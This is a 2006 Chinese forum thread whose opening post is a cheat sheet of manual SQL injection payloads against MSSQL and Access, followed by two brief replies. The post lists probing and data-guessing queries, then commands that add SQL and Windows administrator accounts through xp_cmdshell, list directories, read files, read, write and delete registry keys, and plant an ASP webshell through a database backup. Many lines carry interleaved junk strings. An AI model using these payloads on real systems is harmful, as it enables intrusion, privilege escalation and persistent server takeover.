社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4856阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 eplz5%<  
  2.初步判断是否是mssql ;and user>0 C9,|G7~*q  
MM+xm{4l  
  3.注入参数是字符'and [查询条件] and ''=' go6XUe  
,C=Lu9  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' GH6HdZ  
f>*D@TrU  
  5.判断数据库系统 (P+TOu-y\  
\1[=t+/  
  ;and (select count(*) from sysobjects)>0 mssql (9"w{pnlLc  
%gd {u\h^  
  ;and (select count(*) from msysobjects)>0 access 3?R56$-+  
_F2 R x@Y  
\),DW)  
5-=&4R\k  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 #><P28m  
],?rFK{O  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 3@t&5UjwQ  
?4[IIX-  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 b3h3$kIYN  
$$,/F  
  9.(1)猜字段的ascii值(access) !LG 5q/}&  
hS( )OY  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "vH>xBR[%  
EAdr}io  
  (2)猜字段的ascii值(mssql)  3ih3O  
o'Uaz*-po  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >Q`\|m}x)Q  
dN8@ 0AMSf  
  10.测试权限结构(mssql) aX)k (*|  
$ykujyngS4  
V5.=08L  
-$x5[6bN  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <kmH^ viX  
T[?toqkD>z  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- C:?mOM#_  
#835 $vOe  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Bb~Q]V=x;  
$4*wK@xu  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- oB$P6   
1-h"1UN2E  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- GY%2EM(  
[}GPo0GY  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- y3,'1^lA  
MnQ4,+ji-  
  ;and 1=(select IS_MEMBER('db_owner'));-- wT taj08D  
0sQt+_Dl%L  
LdPA`oI3j  
2fa1jl  
  11.添加mssql和系统的帐户 kT=KxS{  
++d%D9*V<  
  ;exec master.dbo.sp_addlogin username;-- Uyuvmt>  
  ;exec master.dbo.sp_password null,username,password;-- A~!v+W%vO1  
KeGGF]=>  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FxkxV GZ"  
b: c$EPK  
  ;exec master.dbo.xp_cmdshell 'net user username password O1 KT  
%xJ6t 5.-  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kw M1f=!-  
KysJ3G.k\  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- FEF $4)ROv  
2`]`nTz,  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- QMI6l'"s  
pE~>k:  
1p|h\H  
]9 ArT$  
  12.(1)遍历目录 @ uF$m/g  
b.4H4LV  
  ;create table dirs(paths varchar(100), id int) Q|CLis-  
$3BH82  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\'  g%.;ZlK  
0C,2gcq  
  ;and (select top 1 paths from dirs)>0 `yvH0B -  
Mqk[+n  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) `El)uTnuZ[  
n{@^ne4 m  
n6 VX0R  
gE}+`w/X  
  (2)遍历目录 mjI $z3  
zQt"i`{U  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- b14WIgjsl  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 KJLC2,  
^=1:!'*3D  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5TB==Fj ?  
(v2.8zrJ  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 R|,F C'  
Z'V"nhL  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容  Bm\OH#  
03$lgDQ  
PAcbC| y  
4_i6q u(4  
  13.mssql中的存储过程 _ft)e3Gf  
_ l$1@  
  xp_regenumvalues 注册表根键, 子键 8#_"WzDw  
(U GmbRf&  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 /5s,< 0Kz  
[? 1m6u;  
  xp_regread 根键,子键,键值名 Nm;V9*5  
8A,="YIt  
  ;exec xp_regread V1 :aR3*!  
8va&*J? 2  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qbunP!  
@:M?Re`L  
  xp_regwrite 根键,子键, 值名, 值类型, 值 Sd\+f6x  
M,WC+")Z=  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 by{ *R  
OM1pyt  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 .%3qzOrN  
%CaUC'  
  xp_regdeletevalue 根键,子键,值名 g0&Rl  
F# a)"$j;  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 L74Sx0nk=  
Do\YPo_Mr  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Cjn)`Q8  
B;6N.X(K  
`JrvD  
6 z2_b wo  
  14.mssql的backup创建webshell *]uj0@S  
v."0igMO  
  use model Z7@~#)3  
J ;e/S6l  
  create table cmd(str image); L3 VyW8Y  
puPYM"  
  insert into cmd(str) values (''); .:(N1n'>1  
CNRiK;nQ  
  backup database model to disk='c:\l.asp'; xSal=a;k  
V1= (^{p8  
<e%~K4KH  
I$#)k^Q  
  15.mssql内置函数 w]Fi:kV  
.}6Mj]7?i  
  ;and (select @@version)>0 获得Windows的版本号 H>/LC* 8-  
~H+W[r}  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa A8by5qU  
g'Id3 1r'  
  ;and (select user_name())>0 爆当前系统的连接用户 (q|EC;   
C $r]]MSj  
  ;and (select db_name())>0 得到当前连接的数据库 U if61)+!i  
:: 2pDtMS  
kpU-//lk+  
faJ>,^V#  
  16.简洁的webshell 9"TPAywd  
V(LE4P 1  
  use model TiF2c#Q*y  
ncy?w e  
  create table cmd(str image); ,aLdW,<6  
sIZ|N"2]A*  
  insert into cmd(str) values (''); w&E*{{otJ  
@jp}WwC/  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八